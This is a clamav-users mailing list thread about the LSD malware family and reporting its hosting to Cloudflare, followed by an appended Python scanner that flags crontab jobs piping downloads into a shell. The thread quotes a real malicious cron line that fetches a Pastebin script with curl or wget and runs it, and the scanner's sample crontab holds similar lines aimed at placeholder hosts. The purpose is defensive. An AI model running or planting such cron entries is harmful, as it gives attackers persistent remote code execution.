[clamav-users] LSD Malwares
Xavier Maysonnave
x.maysonnave at gmail.com
Mon Apr 29 05:08:19 UTC 2019
Dear Friends,
I got an answer from Cloudflare. Here is their message:
Hi Xavier Maysonnave,
We have placed an interstitial up and sent a notification to the user.
Regards,
Cloudflare Trust and Safety
Light
Pudhuveedu / Xavier
PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
On Sat, Apr 27, 2019 at 10:30, Xavier Maysonnave <x.maysonnave at gmail.com>
wrote:
> Hi Joel,
>
> Thanks for your action.
> I also opened a request @ Cloudflare.
> https://support.cloudflare.com/hc/requests/1677155
> This ticket is not public though but it could be useful to forward its
> reference to your Cloudflare contact.
> Light
>
> Pudhuveedu / Xavier
>
> PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
> <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
>
>
> On Fri, Apr 26, 2019 at 22:18, Joel Esler (jesler) <jesler at cisco.com>
> wrote:
>
>> Dear ClamAV-users,
>>
>> I reached out to my contacts at Cloudflare to take action.
>>
>>
>> --
>> Joel Esler
>> Manager, Communities Division
>> Cisco Talos Intelligence Group
>> http://www.talosintelligence.com
>>
>> On Apr 25, 2019, at 11:25 PM, Xavier Maysonnave via clamav-users <
>> clamav-users at lists.clamav.net> wrote:
>>
>> Hi All,
>>
>> Thanks for your feedback.
>> I'm going to report to Cloudflare this URL.
>>
>> However keep in mind that there are other URLs that are involved in this
>> family.
>> */10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O-
>> https://pastebin.com/raw/wR3ETdbi)|sh
>> This one targets Jenkins, another popular OpenSource tool, not used on
>> our infrastructure though.
>>
>> I'm still very interested in the consequences of this malware. Any
>> hints will be greatly appreciated.
>>
>> Thanks.
>>
>> Light
>>
>> Pudhuveedu / Xavier
>>
>> PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
>> <http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
>>
>>
>> On Fri, Apr 26, 2019 at 08:03, Dave Warren via clamav-users <
>> clamav-users at lists.clamav.net> wrote:
>>
>>> The same applies: Report it. Cloudflare will either forward the
>>> complaint for you, or block the offending URL (or both).
>>>
>>> On 2019-04-25 19:16, Dennis Peterson wrote:
>>> > That domain is hosted on a Cloudflare IP block. They've become part of
>>> > the problem.
>>> >
>>> > dp
>>> >
>>> > On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
>>> >> Perhaps it would also be worthwhile to report dd.heheda.tk to their
>>> >> hosting provider & domain registrar that they are hosting malware and
>>> >> get that site shut down...
>>> >>
>>>
>>> _______________________________________________
>>>
>>> clamav-users mailing list
>>> clamav-users at lists.clamav.net
>>> https://lists.clamav.net/mailman/listinfo/clamav-users
>>>
>>>
>>> Help us build a comprehensive ClamAV guide:
>>> https://github.com/vrtadmin/clamav-faq
>>>
>>> http://www.clamav.net/contact.html#ml
>>>
>>
>>
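
The cron entry quoted in the thread downloads a script with curl or wget and pipes it straight into `sh`. The following is an added example, not part of the list thread or of ClamAV: a small scanner that flags crontab lines of that shape. The function name `scan_crontab` is hypothetical, the sample crontab and its `example.invalid` hosts are constructed, and only the pipe-into-shell form is covered.

```python
import re

# A fetch tool followed (after its options) by an http(s) URL.
FETCH = re.compile(r"\b(?:curl|wget)\b[^|;]*?(https?://[^\s|;)'\"]+)")
# A single pipe (not the "||" operator) into a shell, optionally given by path.
PIPE_TO_SHELL = re.compile(r"(?<!\|)\|(?!\|)\s*(?:/\S*/)?(?:ba|da|k|z)?sh\b")

# Constructed sample crontab; the hosts are placeholders, not real indicators.
SAMPLE = """\
# constructed crontab for the example
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * (curl -fsSL https://paste.example.invalid/raw/AAAA||wget -q -O- https://paste.example.invalid/raw/AAAA)|sh
15 * * * * curl -fsS https://status.example.invalid/ping | grep -q ok
30 2 * * * root wget -qO- http://mirror.example.invalid/setup | /bin/bash
"""


def scan_crontab(text):
    """Return [(line_number, [urls])] for jobs that pipe a download into a shell."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        job = line.strip()
        if not job or job.startswith("#"):
            continue  # skip blank lines and comments
        fetches = list(FETCH.finditer(job))
        if not fetches:
            continue  # no curl/wget download on this line
        # The shell must receive the download, so look for the pipe after it.
        pipe = PIPE_TO_SHELL.search(job, fetches[0].end())
        if pipe:
            urls = sorted({m.group(1) for m in fetches if m.start() < pipe.start()})
            findings.append((lineno, urls))
    return findings


if __name__ == "__main__":
    for lineno, urls in scan_crontab(SAMPLE):
        print(f"line {lineno}: download piped to shell from {', '.join(urls)}")
```

To check a host, feed it the output of `crontab -l` for each user plus the files under `/etc/cron.d` and `/etc/crontab`.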